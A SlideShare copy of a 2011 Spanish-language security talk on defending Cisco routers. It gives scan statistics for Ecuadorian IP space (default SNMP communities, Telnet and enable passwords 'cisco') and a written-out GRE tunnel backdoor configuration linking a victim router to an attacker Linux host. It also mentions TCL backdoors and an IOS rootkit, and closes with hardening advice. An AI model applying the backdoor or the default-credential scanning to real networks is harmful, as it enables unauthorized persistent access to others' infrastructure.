SlideShare une entreprise Scribd logo
1  sur  38
Télécharger pour lire hors ligne
DEFENDIENDO
NUESTRO ROUTER   CISCO     by Leonardo Pigñer (@KFS)


                 e-security conferences
                   Guayaquil, Ecuador - 2011
Leonardo Pigñer
Director de Servicios Profesionales


                                      @base4sec




                                      @ekoparty



    @KFS                  KUNGFOOSION.com
Agenda
1. ¿Por Qué Cisco?

2. Tipos de Ataques

3. Puertas Traseras

4. Recomendaciones
¿Por Qué Cisco?




Source: http://newsroom.cisco.com/documents/10157/1204766/Public_Corporate_Overview_FY11_Q3.pdf
¿Por Qué Hackear
     Routers?




        SECURITY
¿Por Qué Hackear
     Routers?

“El Administrador de Red”
Actualizaciones
 Complejas...
- Licencias ($$$)
- Hardware Descontinuado
¿Cómo Conseguir
  “Estadísticas”
 de ECUADOR?
Registro de Direcciones de Internet
                   Para América Latina y Caribe


wget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest

          lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated
            lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated
           lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated
           lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated
          lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated
            lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated
           lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated

perl lacnic_parser.pl
157.100.0.0/16    190.12.32.0/19     190.154.0.0/17     192.207.40.0/24    200.12.169.0/24    200.105.224.0/20
186.0.144.0/21    190.15.128.0/20    190.154.128.0/17   192.207.41.0/24    200.12.196.0/22    200.105.240.0/20
186.3.0.0/18      190.52.64.0/20     190.155.0.0/17     192.207.42.0/24    200.14.34.0/24     200.107.0.0/19
186.3.64.0/18     190.52.192.0/20    190.155.128.0/17   192.207.65.0/24    200.14.83.0/24     200.107.32.0/19
186.3.128.0/17    190.57.128.0/18    190.214.0.0/17     192.207.66.0/24    200.16.94.0/24     200.107.248.0/21
186.4.128.0/17    190.94.128.0/19    190.214.128.0/17   192.207.67.0/24    200.24.192.0/19    200.110.64.0/20
186.5.0.0/17      190.95.128.0/19    192.188.44.0/24    192.207.68.0/24    200.25.128.0/19    200.110.80.0/20
186.42.0.0/17     190.95.160.0/19    192.188.45.0/24    192.207.244.0/24   200.25.160.0/19    200.110.112.0/20
186.42.128.0/17   190.95.192.0/19    192.188.46.0/24    200.0.28.0/22      200.25.192.0/20    200.110.232.0/21
186.43.128.0/18   190.95.224.0/19    192.188.47.0/24    200.0.63.0/24      200.25.208.0/20    200.115.32.0/20




                  1.698.560
186.46.0.0/17     190.96.96.0/21     192.188.48.0/24    200.0.73.0/24      200.29.240.0/21    200.124.224.0/20
186.46.128.0/17   190.99.72.0/21     192.188.49.0/24    200.0.74.0/24      200.49.240.0/21    200.124.240.0/20
186.47.0.0/16     190.107.64.0/20    192.188.50.0/24    200.0.75.0/24      200.50.232.0/21    200.125.128.0/20
186.65.0.0/18     190.107.232.0/21   192.188.51.0/24    200.0.76.0/24      200.55.224.0/20    200.125.144.0/20
186.66.0.0/17     190.108.64.0/21    192.188.52.0/24    200.0.77.0/24      200.55.248.0/21    200.125.192.0/19
186.66.128.0/17   190.110.192.0/19   192.188.53.0/24    200.0.78.0/24      200.63.192.0/19    200.125.224.0/19
186.68.0.0/15     190.111.64.0/20    192.188.54.0/24    200.1.6.0/24       200.63.224.0/20    200.126.0.0/19
186.70.0.0/15     190.120.64.0/20    192.188.55.0/24    200.1.161.0/24     200.63.240.0/20    201.217.64.0/19
186.101.0.0/16    190.120.80.0/20    192.188.56.0/24    200.1.172.0/24     200.69.160.0/20    201.217.96.0/19
186.178.0.0/16    190.123.0.0/20     192.188.57.0/24    200.7.83.0/24      200.69.176.0/20    201.218.0.0/19
190.8.180.0/22    190.123.48.0/20    192.188.58.0/24    200.7.192.0/19     200.73.200.0/21    201.218.32.0/19
190.9.160.0/20    190.130.128.0/17   192.188.59.0/24    200.7.224.0/19     200.85.80.0/21     201.219.0.0/19
190.9.176.0/20    190.131.0.0/18     192.188.60.0/24    200.9.96.0/24      200.90.152.0/21    201.219.32.0/19
190.10.128.0/18   190.131.64.0/18    192.188.194.0/24   200.9.176.0/24     200.93.192.0/19    201.238.128.0/19
190.10.192.0/18   190.131.128.0/18   192.188.195.0/24   200.9.248.0/24     200.93.224.0/20    201.238.160.0/20
190.11.0.0/19     190.152.0.0/17     192.188.196.0/24   200.10.147.0/24    200.93.248.0/21    201.238.176.0/20
190.12.0.0/19     190.152.128.0/17   192.188.197.0/24   200.10.148.0/22    200.105.112.0/21
Errar es Humano,
    ¿Perdonar es Divino?
-   SNMP por Default
-   Contraseñas Débiles
- Vulnerabilidades

-   Protocolos
SNMP   Simple Network
       Management Protocol
SNMP                Simple Network
                    Management Protocol


• Versiones: SNMPv1 - SNMPv2 - SNMPv3
• MIB: Base de Información de Administración
• Comunidad = Contraseña
     - “public” = comunidad de lectura
     - “private” = comunidad de escritura
DEMO Tripper.pl
             by @KFS
SNMP Scanning

          - Public
          - Private
Total = 1.695.560   SNMP “default” = 5.925




         0%

                        - Public = 5.465
                        - Private = 460




        100%




SNMP Default
OTROS = 4.713     CISCO = 1.212




           20%




                   80%




Dispositivos Cisco
11.2(16)P = 1        12.3(3a) = 2
                                                              12.0(11) = 1         12.3(3g) = 1
                                                              12.0(28b) = 2        12.3(8)YG4 = 1
                                                              12.0(5.4)WC(1) = 2   12.3(8)YI3 = 12
                                                                                   12.4(10) = 1

      Versiones de IOS
                                                              12.0(7) = 2
                                                              12.0(7)T = 5         12.4(10b) = 4
                                                              12.1(27b) = 1        12.4(11)T = 4
                                                              12.1(5)T10 = 2       12.4(11)XW7 = 1
                                                              12.1(5)T8 = 1        12.4(12a) = 3
                                                              12.1(8c) = 1         12.4(15)T4 = 46
                                                              12.2(15)T = 1        12.4(15)T5 = 79
                                                              12.2(15)T17 = 1      12.4(15)T7 = 7
700                                                           12.2(17) = 1         12.4(15)T9 = 11
                                                                                   12.4(18) = 3
                                                              12.2(1a) = 4
                                                              12.2(25)SEA = 1      12.4(19) = 168
                                                              12.2(25)SEB4 = 1     12.4(19b) = 8
                                                              12.2(25)SEE2 = 29    12.4(1a) = 3
                                                              12.2(25)SEE3 = 1     12.4(1c) = 11
                                                              12.2(33)SB5 = 254    12.4(20)T2 = 4
525                                                           12.2(33)SRA = 71     12.4(20)T5 = 1
                                                                                   12.4(24)T = 57
                                                              12.2(33)SRC3 = 144
                                                              12.2(33)SRD3 = 135   12.4(24)T1 = 7
                                                              12.2(4)YH = 2        12.4(24)T2 = 2
                                                              12.2(55)SE = 1       12.4(24)T4 = 1
                                                              12.2(6a) = 1         12.4(3g) = 3
                                                              12.2(8)YN = 1        12.4(3h) = 4
350                                                           12.3(11)T = 2        12.4(3i) = 3
                                                                                   12.4(4)T8 = 8
                                                              12.3(11)T10 = 1
                                                              12.3(11)T2 = 6       12.4(6)T11 = 9
                                                              12.3(11)T3 = 1       12.4(6)T7 = 1
                                                              12.3(12c) = 1        15.0(1)M2 = 48
                                                              12.3(16) = 2         15.0(1)M3 = 5
                                                              12.3(22) = 1         15.0(1)M4 = 4
175                                                           12.3(23) = 3         15.0(1)M5 = 1
                                                                                   15.0(1)M7 = 4
                                                              12.3(26) = 1
                                                                                   15.1(2)T4 = 1




  0
      11.2   12.0   12.1   12.2   12.3   12.4   15.0   15.1
12.2
• Fin de Venta
• Fin de Mantenimiento
TELNET

     Default Password:

      “cisco”
CISCO SNMP = 1.212         TELNET “cisco” = 29




                       1%




                       99%




TELNET con “cisco”
TELNET “cisco” = 29   ENABLE “cisco” = 13




           31%




                          69%




ENABLE con “cisco”
DEMO getCISCO
           by @KFS
¿vulnerabilidades?
¿vulnerabilidades?




getIOS.pl
ataque a protocolos
IRPAS “Internetwork Routing Protocol Attack Suite”

  Protocolos soportados:
  •   CDP
  •   IRDP
  •   IGRP
  •   EIGRP (discovery)
  •   RIPv1 (discovery)
  •   RIPv2 (discovery)        http://www.phenoelit-us.org/
  •   OSPF (discovery)
  •   HSRP
  •   DHCP DORA
  •   ICMP Redirects
http://www.networkworld.com/news/2011/080411-blackhat-ospf-vulnerability.html
Backdoor con Túnel GRE
Cisco
  DEMO!                                 interface Tunnel2
                                        ip address 2.2.2.1 255.255.255.0
                                        tunnel source [Publica_Linux]
                                        tunnel destination [Publica_Cisco]
                                        tunnel mode gre ip




      Linux
modprobe ip_gre
ip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255
ip link set a_VICTIMA_2 up
ip addr add 2.2.2.2 dev a_VICTIMA_2
ip route add 2.2.2.0/24 dev a_VICTIMA_2
DIK “DA IOS ROOTKIT”
Sebastian 'topo' Muñiz
http://cir.recurity.com/cir/default.aspx
TCL Backdoor
•   Necesita “ENABLE”
•   IOS 12.2(25) S, 12.3(2) T
•   Funciona en otras versiones...
• “tclsh”



                                 DEMO!
Recomendaciones
• Actualizar   el Software
•   Deshabilitar Servicios No Usados
•   Bloquear el Tráfico
•   Segmentar la Red de Administración
•   Correlacionar Logs




                                         @base4sec
¿preguntas?



              @base4sec
GRACIAS!!

@KFS   KUNGFOOSION.com

Contenu connexe

En vedette

Redes informáticas componentes y su funcionamiento Correa fatima y flavia
Redes informáticas componentes y su funcionamiento Correa fatima y flaviaRedes informáticas componentes y su funcionamiento Correa fatima y flavia
Redes informáticas componentes y su funcionamiento Correa fatima y flaviaLizi Correa
 
Direccionamiento ip
Direccionamiento ipDireccionamiento ip
Direccionamiento iplaura1352
 
Capitulo 2 enrutamiento estatico
Capitulo 2 enrutamiento estaticoCapitulo 2 enrutamiento estatico
Capitulo 2 enrutamiento estaticoTeleredUSM
 
Redes Informáticas Jaime
Redes Informáticas JaimeRedes Informáticas Jaime
Redes Informáticas Jaimejaicho92
 
Redes Informáticas
Redes InformáticasRedes Informáticas
Redes Informáticasnelson
 
Capitulo 8 la tabla de enrutamiento
Capitulo 8 la tabla de enrutamientoCapitulo 8 la tabla de enrutamiento
Capitulo 8 la tabla de enrutamientoTeleredUSM
 
Ejercicios de subnetting
Ejercicios de subnetting Ejercicios de subnetting
Ejercicios de subnetting Marcelo Herrera
 
Implementación de NAT/PAT en routers Cisco
Implementación de NAT/PAT en routers CiscoImplementación de NAT/PAT en routers Cisco
Implementación de NAT/PAT en routers CiscoPaulo Colomés
 
Comunicacion de datos y redes informaticas
Comunicacion de datos y redes informaticasComunicacion de datos y redes informaticas
Comunicacion de datos y redes informaticasRamon Molina
 
CISCO 1 - Introduccion a las redes
CISCO 1 - Introduccion a las redesCISCO 1 - Introduccion a las redes
CISCO 1 - Introduccion a las redestelecocisco
 
Direccionamiento ip y subredes
Direccionamiento ip y subredesDireccionamiento ip y subredes
Direccionamiento ip y subredesiuzeth Sabillon
 
Manual de instalación y administración de active directory en windows server ...
Manual de instalación y administración de active directory en windows server ...Manual de instalación y administración de active directory en windows server ...
Manual de instalación y administración de active directory en windows server ...camilaml
 
Redes InformáTicas
Redes InformáTicasRedes InformáTicas
Redes InformáTicaslu93
 

En vedette (20)

QOS y congestion
QOS y congestionQOS y congestion
QOS y congestion
 
DHCP - Cisco I
DHCP - Cisco IDHCP - Cisco I
DHCP - Cisco I
 
Redes informáticas componentes y su funcionamiento Correa fatima y flavia
Redes informáticas componentes y su funcionamiento Correa fatima y flaviaRedes informáticas componentes y su funcionamiento Correa fatima y flavia
Redes informáticas componentes y su funcionamiento Correa fatima y flavia
 
Direccionamiento ip
Direccionamiento ipDireccionamiento ip
Direccionamiento ip
 
Capitulo 2 enrutamiento estatico
Capitulo 2 enrutamiento estaticoCapitulo 2 enrutamiento estatico
Capitulo 2 enrutamiento estatico
 
Terminología de Redes
Terminología de RedesTerminología de Redes
Terminología de Redes
 
Redes Informáticas Jaime
Redes Informáticas JaimeRedes Informáticas Jaime
Redes Informáticas Jaime
 
Redes Informáticas
Redes InformáticasRedes Informáticas
Redes Informáticas
 
Capitulo 8 la tabla de enrutamiento
Capitulo 8 la tabla de enrutamientoCapitulo 8 la tabla de enrutamiento
Capitulo 8 la tabla de enrutamiento
 
Ejercicios de subnetting
Ejercicios de subnetting Ejercicios de subnetting
Ejercicios de subnetting
 
Cisco: MPLS en Castellano
Cisco: MPLS en CastellanoCisco: MPLS en Castellano
Cisco: MPLS en Castellano
 
Implementación de NAT/PAT en routers Cisco
Implementación de NAT/PAT en routers CiscoImplementación de NAT/PAT en routers Cisco
Implementación de NAT/PAT en routers Cisco
 
Calculo de sub redes
Calculo de sub redesCalculo de sub redes
Calculo de sub redes
 
Comunicacion de datos y redes informaticas
Comunicacion de datos y redes informaticasComunicacion de datos y redes informaticas
Comunicacion de datos y redes informaticas
 
CISCO 1 - Introduccion a las redes
CISCO 1 - Introduccion a las redesCISCO 1 - Introduccion a las redes
CISCO 1 - Introduccion a las redes
 
Direccionamiento ip y subredes
Direccionamiento ip y subredesDireccionamiento ip y subredes
Direccionamiento ip y subredes
 
Manual de instalación y administración de active directory en windows server ...
Manual de instalación y administración de active directory en windows server ...Manual de instalación y administración de active directory en windows server ...
Manual de instalación y administración de active directory en windows server ...
 
Redes InformáTicas
Redes InformáTicasRedes InformáTicas
Redes InformáTicas
 
DIRECCIONAMIENTO IP BASICO I
DIRECCIONAMIENTO IP BASICO IDIRECCIONAMIENTO IP BASICO I
DIRECCIONAMIENTO IP BASICO I
 
Direccionamiento Ip Y Subredes Ejercicios Resueltos
Direccionamiento Ip Y Subredes Ejercicios ResueltosDireccionamiento Ip Y Subredes Ejercicios Resueltos
Direccionamiento Ip Y Subredes Ejercicios Resueltos
 

Similaire à Defendiendo Nuestro Router CISCO

Números enteros
Números enterosNúmeros enteros
Números enterosDaysi N
 
College algebra Assignment
College algebra AssignmentCollege algebra Assignment
College algebra AssignmentDenni Domingo
 
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdf
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdfKomatsu 102 Series Engine Shop Manual Sa6d102e.pdf
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdfExcavator
 
Capítulo 05 deflexão e rigidez
Capítulo 05   deflexão e rigidezCapítulo 05   deflexão e rigidez
Capítulo 05 deflexão e rigidezJhayson Carvalho
 
Boas mathematical methods in the physical sciences 3ed instructors solutions...
Boas  mathematical methods in the physical sciences 3ed instructors solutions...Boas  mathematical methods in the physical sciences 3ed instructors solutions...
Boas mathematical methods in the physical sciences 3ed instructors solutions...Praveen Prashant
 
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-edition
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-editionComplete solutions-mathematical-methods-in-the-physical-sciences-3rd-edition
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-editionAba Dula
 
7 วิชา คณิต the brain
7 วิชา คณิต   the brain7 วิชา คณิต   the brain
7 วิชา คณิต the brainJamescoolboy
 
ข้อสอบคณิตศาสตร์
ข้อสอบคณิตศาสตร์ข้อสอบคณิตศาสตร์
ข้อสอบคณิตศาสตร์Jamescoolboy
 
Math quota-cmu-g-455
Math quota-cmu-g-455Math quota-cmu-g-455
Math quota-cmu-g-455Rungroj Ssan
 
Texto de matemática y lógica
Texto de matemática y lógicaTexto de matemática y lógica
Texto de matemática y lógicaOdín Zapata
 
Texto de matemática y lógica
Texto de matemática y lógicaTexto de matemática y lógica
Texto de matemática y lógicaodinzapatacruz
 
Valor numerico de un termino algebraico
Valor numerico de un termino algebraicoValor numerico de un termino algebraico
Valor numerico de un termino algebraicoRamiro Muñoz
 
Metodologia de la programación - expresiones
Metodologia de la programación - expresionesMetodologia de la programación - expresiones
Metodologia de la programación - expresionesMar_Angeles
 
Solutions manual for calculus an applied approach brief international metric ...
Solutions manual for calculus an applied approach brief international metric ...Solutions manual for calculus an applied approach brief international metric ...
Solutions manual for calculus an applied approach brief international metric ...Larson612
 

Similaire à Defendiendo Nuestro Router CISCO (20)

Números enteros
Números enterosNúmeros enteros
Números enteros
 
College algebra Assignment
College algebra AssignmentCollege algebra Assignment
College algebra Assignment
 
1.3.2
1.3.21.3.2
1.3.2
 
Shi20396 ch05
Shi20396 ch05Shi20396 ch05
Shi20396 ch05
 
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdf
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdfKomatsu 102 Series Engine Shop Manual Sa6d102e.pdf
Komatsu 102 Series Engine Shop Manual Sa6d102e.pdf
 
Ch13p
Ch13pCh13p
Ch13p
 
Calculo de-reacciones
Calculo de-reaccionesCalculo de-reacciones
Calculo de-reacciones
 
Capítulo 05 deflexão e rigidez
Capítulo 05   deflexão e rigidezCapítulo 05   deflexão e rigidez
Capítulo 05 deflexão e rigidez
 
Boas mathematical methods in the physical sciences 3ed instructors solutions...
Boas  mathematical methods in the physical sciences 3ed instructors solutions...Boas  mathematical methods in the physical sciences 3ed instructors solutions...
Boas mathematical methods in the physical sciences 3ed instructors solutions...
 
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-edition
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-editionComplete solutions-mathematical-methods-in-the-physical-sciences-3rd-edition
Complete solutions-mathematical-methods-in-the-physical-sciences-3rd-edition
 
7 วิชา คณิต the brain
7 วิชา คณิต   the brain7 วิชา คณิต   the brain
7 วิชา คณิต the brain
 
ข้อสอบคณิตศาสตร์
ข้อสอบคณิตศาสตร์ข้อสอบคณิตศาสตร์
ข้อสอบคณิตศาสตร์
 
Math quota-cmu-g-455
Math quota-cmu-g-455Math quota-cmu-g-455
Math quota-cmu-g-455
 
Vedic part 1
Vedic part 1Vedic part 1
Vedic part 1
 
Texto de matemática y lógica
Texto de matemática y lógicaTexto de matemática y lógica
Texto de matemática y lógica
 
Texto de matemática y lógica
Texto de matemática y lógicaTexto de matemática y lógica
Texto de matemática y lógica
 
9. surds & indices
9. surds & indices9. surds & indices
9. surds & indices
 
Valor numerico de un termino algebraico
Valor numerico de un termino algebraicoValor numerico de un termino algebraico
Valor numerico de un termino algebraico
 
Metodologia de la programación - expresiones
Metodologia de la programación - expresionesMetodologia de la programación - expresiones
Metodologia de la programación - expresiones
 
Solutions manual for calculus an applied approach brief international metric ...
Solutions manual for calculus an applied approach brief international metric ...Solutions manual for calculus an applied approach brief international metric ...
Solutions manual for calculus an applied approach brief international metric ...
 

Dernier

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 

Dernier (20)

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 

Defendiendo Nuestro Router CISCO

  • 1. DEFENDIENDO NUESTRO ROUTER CISCO by Leonardo Pigñer (@KFS) e-security conferences Guayaquil, Ecuador - 2011
  • 2. Leonardo Pigñer Director de Servicios Profesionales @base4sec @ekoparty @KFS KUNGFOOSION.com
  • 3. Agenda 1. ¿Por Qué Cisco? 2. Tipos de Ataques 3. Puertas Traseras 4. Recomendaciones
  • 4. ¿Por Qué Cisco? Source: http://newsroom.cisco.com/documents/10157/1204766/Public_Corporate_Overview_FY11_Q3.pdf
  • 5. ¿Por Qué Hackear Routers? SECURITY
  • 6. ¿Por Qué Hackear Routers? “El Administrador de Red”
  • 8. - Licencias ($$$) - Hardware Descontinuado
  • 9. ¿Cómo Conseguir “Estadísticas” de ECUADOR?
  • 10. Registro de Direcciones de Internet Para América Latina y Caribe wget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated perl lacnic_parser.pl
